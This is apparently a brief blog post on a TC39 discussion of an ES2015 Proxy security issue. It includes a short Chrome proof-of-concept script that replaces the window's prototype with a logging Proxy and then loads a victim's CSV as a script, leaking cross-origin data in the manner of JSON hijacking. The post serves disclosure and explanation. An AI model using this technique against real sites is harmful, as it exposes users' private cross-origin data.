TC39 discuss about potential security issue of ES6 Proxy.
There’s a security issue on the web with ES2015 Proxies where a cross-origin request can be made to load some ECMAScript code, and this request can leak some information across origins due to the existence of Proxies.
POC on Chrome:
<script> window.__proto__ = Proxy.create({ get: function(target, name) {console.log("data=" + name)} }); </script> <script src="http://victim/test.csv"></script> Firefox lock down Object.prototype.
This issue is similar to JSON Hijacking.
blog comments powered by Disqus
